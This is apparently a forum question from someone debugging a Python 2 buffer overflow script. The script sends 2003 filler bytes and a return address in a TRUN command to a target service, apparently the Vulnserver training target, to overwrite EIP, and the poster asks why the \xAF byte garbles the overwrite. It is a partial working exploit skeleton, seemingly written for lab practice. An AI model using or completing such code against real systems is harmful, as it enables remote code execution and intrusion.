I'm attempting to do a buffer overflow and have the following script in Python that attacks the target machine.
import socket
buffer = "A" * 2003 + '\xAF\x11\x50\x62'
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('ip', port))
s.recv(1024)
s.send('TRUN /.:/' + buffer)
s.close()
except:
print "Connection failed"
My problem is when I am trying to overwrite the EIP, if I enter in the memory address that includes letters (AF), the EIP changes completely. In little Endian I need the EIP to be 625011AF. When I plug '\xAF\x11\x50\x62' into my buffer string my EIP is written as 00BFFF6F. However, if I replace the af in the string to a number like 'x09\x11\x50\x62' my EIP is overwritten to 62501109 as I'm expecting. I'm not sure and I can't figure out why the \xaf is throwing the whole EIP number off when overwritten. Any thoughts would be greatly appreciated.